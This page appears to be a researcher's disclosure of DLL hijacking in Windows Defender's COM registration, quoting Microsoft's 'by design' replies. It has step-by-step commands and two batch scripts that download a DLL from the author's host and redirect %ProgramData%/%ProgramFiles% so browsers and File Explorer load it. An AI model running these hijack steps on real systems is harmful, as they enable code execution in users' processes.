Valid HTML 4.01 Transitional Valid CSS Valid SVG 1.0

Me, myself & IT

Vulnerabilities introduced by Windows® Defender

Purpose
Reason
Case 1
Demonstration
Batch Script
Vendor Statement
Case 2
Demonstration
Batch Script
Vendor Statement
Background Information
Case 3
Demonstration
Batch Script
Mitigation

Purpose

Demonstrate vulnerabilities introduced by Windows Defender and the anti-malware interfaces of Microsoft® Windows NT.
Also show that the tamper protection announced in the MSKB articles 2769299 and 4490103, and described in more detail by Protect security settings with tamper protection, is a bad joke, while its documentation tells a blatant lie:
With tamper protection, malicious apps are prevented from taking actions like these:

Reason

Windows Defender and the anti-malware interfaces implemented in Windows, like almost all so-called security software, don’t increase the safety and security of the operating system, but decrease it instead, and allow to launch attacks in the first place!

As shown hereafter, it is not even able to protect itself, despite the highlighted claim from its documentation.

Case 1

In September 2017, Microsoft published the update 4052623 for Windows 10 which relocates many executable files of Windows Defender from the directories %ProgramFiles%\Windows Defender\ and %ProgramFiles(x86)%\Windows Defender\ to %ProgramData%\Microsoft\Windows Defender\platform\‹version›\, violating the minimum requirements of their own Designed for Windows specification.

Note: I wish that somebody working for Microsoft were capable to understand English language and teach developers the difference between program files and (program) data as well as (application) data!

Ever since this braindead move, the registered pathnames of the COM classes provided by Windows Defender reference the environment variable ProgramData:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}]
@="Defender CSP"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
"ThreadingModel"="Free"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
Note: the double quotes around the DLL pathnames are superfluous, and another indicator for Microsoft’s sloppy developement process and the missing quality assurance!

Of special interest here is the implementation of the IOfficeAntiVirus COM interface, documented in the MSKB article Microsoft Windows Defender helps provide real-time protection.

This COM interface, introduced with Windows 2000 and Internet Explorer 5, is (for example) called by the Attachment Manager introduced with Windows XP SP2 and Internet Explorer 6 SP2.

The Attachment Manager is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page, an email or an attachment, and by File Explorer when such a file (which carries the Mark of the Web, i.e. an NTFS Alternate Data Stream named Zone.Identifier) is to be opened or executed.

Thanks to the (user-controlled) environment variable ProgramData specified in the registered pathname "%ProgramData%\Microsoft\Windows Defender\platform\‹version›\MpOav.dll" an (unprivileged) attacker can provide an arbitrary (rogue or malicious) DLL which is then loaded and executed by WWW browsers, mail and news clients, instant messengers and File Explorer whenever the user stores or opens a downloaded file, a WWW page or an attachment.

Note: this well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows 10 with the anti-malware platform update 4052623 installed perform the following 10 (plus 1) simple steps.
  1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %ComSpec% alias %SystemRoot%\System32\CMD.EXE.

  2. Download the portable executable file SENTINEL.EXE of the Vulnerability and Exploit Detector and save it in your Downloads directory %USERPROFILE\Downloads\:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    Note: the downloaded file gets the Mark of the Web!
  3. Download the cabinet archive SENTINEL.CAB of the Vulnerability and Exploit Detector and save it in your Temp directory %TMP%\, then extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

    BITSADMIN.EXE /TRANSFER Sentinel /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
    EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
    Microsoft (R) File Expansion Utility  Version 10.0.11001.16384
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
    
    Expanding Files ....
    
    Expanding Files Complete ...
    7 files total.
  4. Determine the registered pathname of MPOAV.DLL:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32" /VE
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32
        (Default)    REG_EXPAND_SZ    "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
  5. Choose an arbitrary directory where you can create subdirectories, for example your user profile %USERPROFILE%\, the root directory of Windows’ system drive %SystemDrive%\, or even a (remote) network share like %LOGONSERVER%\Users\Public\, then create the subdirectories Microsoft\, Windows Defender\, Platform\ and ‹version›\ displayed in the previous step 4. beyond it:

    MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0"
  6. Copy the SENTINEL.DLL that matches the bitness of your system as MPOAV.DLL into the directory ‹version› created in the previous step 5.:

    COPY "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
    on 32-bit (I386 alias x86) installations, and
    COPY "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
    on 64-bit (AMD64 alias x64) installations!
  7. Verify that you copied the appropriate SENTINEL.DLL and check its proper function:

    MSIEXEC.EXE /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
  8. Set the environment variable ProgramData to the pathname of the directory used in step 5.:

    SET ProgramData=%SystemDrive%
    SETX.EXE ProgramData %SystemDrive%
  9. [Screenshot of SENTINEL.DLL called from 'Internet Explorer' via 'Attachment Manager'] Start every WWW browser available with the same bitness as your system, then download an arbitrary file and notice the message box displayed by the (replaced) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll called from the WWW browser and running unrestricted:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
    START IEXPLORE https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
    "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    …
  10. Start the portable executable file SENTINEL.EXE downloaded in step 2. (which got the Mark of the Web) and again notice the message box displayed by the (replaced) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll now called from File Explorer:

    START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
  11. Finally verify that neither the tamper protection nor the IOAV protection are disabled:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
        TamperProtection    REG_DWORD    0x1
    
    ERROR: The specified registry key or value was not found.
    
    ERROR: The specified registry key or value was not found.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows 10 with the anti-malware platform update 4052623 installed.
Rem Copyright © 2018-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

If Not Defined ProgramData Exit /B
If Not Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

SetLocal EnableDelayedExpansion EnableExtensions
For /F "Delims== Tokens=2" %%? In ('Assoc "CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32"') Do Set OFFENDER=%%~?
If /I Not "%OFFENDER:~0,50%" == "%%ProgramData%%\Microsoft\Windows Defender\Platform\" Exit /B
If /I Not "%OFFENDER:~-10%" == "\MPOAV.dll" Exit /B
Set OFFENDER=!OFFENDER:%%ProgramData%%=%SystemDrive%!
If Exist "%OFFENDER%" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

MkDir "%OFFENDER:~0,-10%"
If Defined ProgramFiles(x86) Copy "%TMP%\AMD64\SENTINEL.DLL" "%OFFENDER%"
If Not Defined ProgramFiles(x86) Copy "%TMP%\I386\SENTINEL.DLL" "%OFFENDER%"
Set ProgramData=%SystemDrive%
"%SystemRoot%\System32\SetX.exe" ProgramData "%SystemDrive%"

Start https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Start IEXPLORE https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57439 to the above vulnerability report and replied with the following statements:
After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.
OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramData%\…\‹filename›.‹extension› and a pathname registered as C:\ProgramData\…\‹filename›.‹extension›!

Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.

Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.

There is also no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.
OUCH³: there is neither an utility process nor a decoupled process involved!

The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.

As such, we are closing this case.
That said, I conclude you are neither interested in trustworthy computing nor the safety and security of your customers!

Case 2

Microsoft still registers lots of DLLs (which implement COM classes, cryptography service providers, services, etc.) as well as command lines with paths containing the (pre-defined) environment variables windir, SystemRoot, ProgramFiles, CommonProgramFiles, ProgramFiles(x86) and CommonProgramFiles(x86).

Windows Defender, as shipped with Windows Vista® and newer versions of Windows, installs a COM class which implements the IOfficeAntiVirus COM interface:

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"%ProgramFiles%\Windows Defender\MpOav.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
This COM interface is (for example) called by the Attachment Manager, which is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page or an attachment, and by File Explorer when such a file (which carries the Mark of the Web) is to be opened or executed.

Since (user) environment variables set in a user’s profile obscur (system) environment variables with the same name set for the machine, (unprivileged) users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended DLLs and programs!

Note: the resulting well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Note: Microsoft Security Essentials, available for Windows XP, Windows Vista and Windows 7, does not suffer from this vulnerability!

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows Vista or any newer version of Windows, except Windows 10 with the anti-malware platform update 4052623 installed, perform the following 11 (plus 1) simple steps.
  1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %ComSpec% alias %SystemRoot%\System32\CMD.EXE.

  2. Download the portable executable file SENTINEL.EXE of the Vulnerability and Exploit Detector and save it in your Downloads directory %USERPROFILE\Downloads\:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    Note: the downloaded file gets the Mark of the Web!
  3. Create a directory Rogue Program Files\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles%\ directory inside the new directory:

    MKDIR "%SystemDrive%\Rogue Program Files"
    XCOPY.EXE "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
    FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%?"
    C:\Program Files\Windows Defender\MpAsDesc.dll
    C:\Program Files\Windows Defender\MpClient.dll
    C:\Program Files\Windows Defender\MpCmdRun.exe
    C:\Program Files\Windows Defender\MpCommu.dll
    C:\Program Files\Windows Defender\MpEvMsg.dll
    C:\Program Files\Windows Defender\MpOAV.dll
    C:\Program Files\Windows Defender\MpRTP.dll
    C:\Program Files\Windows Defender\MpSvc.dll
    C:\Program Files\Windows Defender\MSASCui.exe
    C:\Program Files\Windows Defender\MsMpCom.dll
    C:\Program Files\Windows Defender\MsMpLics.dll
    C:\Program Files\Windows Defender\MsMpRes.dll
    C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui
    C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui
    C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui
    15 File(s) copied
    
    Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
    …
    Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
  4. On 64-bit installations, additionally create a directory Rogue Program Files (x86)\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles(x86)%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles(x86)%\ directory inside the new directory:

    MKDIR "%SystemDrive%\Rogue Program Files (x86)"
    XCOPY.EXE "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
    FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%?"
    C:\Program Files (x86)\Windows Defender\MpAsDesc.dll
    C:\Program Files (x86)\Windows Defender\MpClient.dll
    C:\Program Files (x86)\Windows Defender\MpOAV.dll
    C:\Program Files (x86)\Windows Defender\MsMpLics.dll
    C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui
    C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui
    6 File(s) copied
    
    Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
    …
    Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
  5. Download the cabinet archive SENTINEL.CAB of the Vulnerability and Exploit Detector and save it in your Temp directory %TMP%\, then extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

    BITSADMIN.EXE /TRANSFER Sentinel /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
    EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
    Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
    
    Expanding Files ....
    
    Expanding Files Complete ...
    7 files total.
  6. On 32-bit installations, copy the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:

    COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
  7. On 64-bit installations, copy the 64-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:

    COPY /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
    COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll"
  8. Save the value of the environment variable ProgramFiles, then set it to the pathname of the directory created in step 3.:

    SET RealProgramFiles=%ProgramFiles%
    SET ProgramFiles=%SystemDrive%\Rogue Program Files
    SETX.EXE ProgramFiles "%SystemDrive%\Rogue Program Files"
  9. On 64-bit installations, additionally save the value of the environment variable ProgramFiles(x86), then set it to the pathname of the directory created in step 4.:

    SET RealProgramFiles(x86)=%ProgramFiles(x86)%
    SET ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
    SETX.EXE ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
  10. Download an arbitrary file with your WWW browser, for example SENTINEL.DLL, or save an attachment in your mail client:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
    "%RealProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
    "%RealProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    This loads and executes %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll which display message boxes with informations about their caller, instead of C:\Program Files\Windows Defender\MpOAV.dll and C:\Program Files (x86)\Windows Defender\MpOAV.dll!
  11. Start the portable executable file SENTINEL.EXE downloaded in step 2. (which got the Mark of the Web) and again notice the message box displayed by %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll or %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll now called from File Explorer:

    START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
  12. Finally verify that neither the tamper protection nor the IOAV protection are disabled:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
        TamperProtection    REG_DWORD    0x1
    
    ERROR: The specified registry key or value was not found.
    
    ERROR: The specified registry key or value was not found.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows Vista and newer versions of Windows.
Rem Copyright © 2009-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

Rem (KB4052623)
Rem If Defined ProgramData If Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

If Not Defined ProgramFiles Exit /B
If Not Exist "%ProgramFiles%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files" Exit /B

MkDir "%SystemDrive%\Rogue Program Files"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files\%%~nx?" "%%?"
Set RealProgramFiles=%ProgramFiles%
Set ProgramFiles=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles "%SystemDrive%\Rogue Program Files"

Start https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL

If Not Defined ProgramFiles(x86) Exit /B
If Not Exist "%ProgramFiles(x86)%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files (x86)" Exit /B

MkDir "%SystemDrive%\Rogue Program Files (x86)"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
Copy /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles(x86)%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files (x86)\%%~nx?" "%%?"
Set RealProgramFiles(x86)=%ProgramFiles(x86)%
Set ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"

"%RealProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57447 to the above vulnerability report and replied with the following statements:
This was also assessed a similar was as they other reported case.

After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.

OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramFiles%\…\‹filename›.‹extension› and a pathname registered as C:\Program Files\…\‹filename›.‹extension›!

Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.

Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.

There is also no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.
OUCH³: there is neither an utility process nor a decoupled process involved!

The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.

As such, we are closing this case.
That said, I conclude you are neither interested in trustworthy computing nor the safety and security of your customers!

Background Information

